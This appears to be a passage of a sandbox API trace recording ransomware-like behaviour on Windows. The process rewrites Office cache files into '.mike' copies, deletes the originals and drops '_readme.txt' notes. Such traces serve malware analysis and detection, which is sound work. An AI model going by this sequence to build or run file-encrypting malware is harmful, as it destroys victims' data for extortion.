lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.841] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.841] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0040.841] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0040.841] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.841] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.841] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.841] GetFileType (hFile=0x264) returned 0x1 [0040.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.841] GetFileType (hFile=0x264) returned 0x1 [0040.841] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0040.841] WriteFile (in: hFile=0x264, lpBuffer=0x21a1398*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21a1398*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0040.842] CloseHandle (hObject=0x264) returned 1 [0040.842] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0040.842] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21a0ea0 | out: lpFileInformation=0x21a0ea0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x309dfcc0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x309dfcc0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5bc88d0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x750)) returned 1 [0040.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0040.843] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.843] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0040.843] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.843] GetFileType (hFile=0x264) returned 0x1 [0040.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0040.843] GetFileType (hFile=0x264) returned 0x1 [0040.843] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0040.843] ReadFile (in: hFile=0x264, lpBuffer=0x21a24c0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x21a24c0*, lpNumberOfBytesRead=0x2af110*=0x750, lpOverlapped=0x0) returned 1 [0040.845] CloseHandle (hObject=0x264) returned 1 [0040.845] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.845] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.845] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.845] GetFileType (hFile=0x264) returned 0x1 [0040.845] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.845] GetFileType (hFile=0x264) returned 0x1 [0040.845] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0040.845] WriteFile (in: hFile=0x264, lpBuffer=0x21a70a4*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21a70a4*, lpNumberOfBytesWritten=0x2af104*=0x750, lpOverlapped=0x0) returned 1 [0040.846] CloseHandle (hObject=0x264) returned 1 [0040.846] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.847] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0040.847] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.847] GetFileType (hFile=0x264) returned 0x1 [0040.847] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0040.847] GetFileType (hFile=0x264) returned 0x1 [0040.848] WriteFile (in: hFile=0x264, lpBuffer=0x21aa2cc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x21aa2cc*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0040.848] CloseHandle (hObject=0x264) returned 1 [0040.848] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.848] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.848] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.849] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe28b0e60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe28b0e60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe28d6fc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x970)) returned 1 [0040.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.849] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.849] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.849] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.849] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21aba48 | out: lpFileInformation=0x21aba48*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe28b0e60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe28b0e60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe28d6fc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x970)) returned 1 [0040.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.849] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.849] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0040.849] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.849] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0040.850] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.850] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.850] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.850] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0040.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0040.850] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0040.851] GetFileType (hFile=0x264) returned 0x1 [0040.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0040.851] GetFileType (hFile=0x264) returned 0x1 [0040.851] WriteFile (in: hFile=0x264, lpBuffer=0x21ad72c*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x21ad72c*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0040.852] CloseHandle (hObject=0x264) returned 1 [0040.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0040.852] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.852] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0040.852] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xe28b0e60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe28d6fc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0040.853] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xe28b0e60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe28d6fc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.853] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x308ae9f0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x308ae9f0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b55ce0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x265400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProjectMUI.msi", cAlternateFileName="PROJEC~1.MSI")) returned 1 [0040.853] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe288ad00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe288ad00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe28b0e60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProjectMUI.xml.mike", cAlternateFileName="PROJEC~1.MIK")) returned 1 [0040.853] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30306de0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30306de0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b7cde0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x7e1dcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProjLR.cab", cAlternateFileName="")) returned 1 [0040.853] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe28b0e60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe28b0e60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe28d6fc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x970, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0040.853] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe28b0e60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe28b0e60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe28d6fc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0040.854] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe28b0e60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe28b0e60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe28d6fc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0040.854] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0040.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0040.854] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\.", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.854] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0040.854] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0040.854] CoTaskMemFree (pv=0x4fe370) [0040.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0040.854] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.854] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0040.854] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.854] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0040.854] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0040.869] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.869] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee4bb7b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x3e7e1f, dwReserved0=0x0, dwReserved1=0x0, cFileName="GrooveLR.cab", cAlternateFileName="")) returned 1 [0040.869] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee3b15e0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x264400, dwReserved0=0x0, dwReserved1=0x0, cFileName="GrooveMUI.msi", cAlternateFileName="GROOVE~1.MSI")) returned 1 [0040.869] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x391, dwReserved0=0x0, dwReserved1=0x0, cFileName="GrooveMUI.xml", cAlternateFileName="GROOVE~1.XML")) returned 1 [0040.870] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0040.870] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.870] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0040.870] SetThreadErrorMode (dwNewMode=0x0, 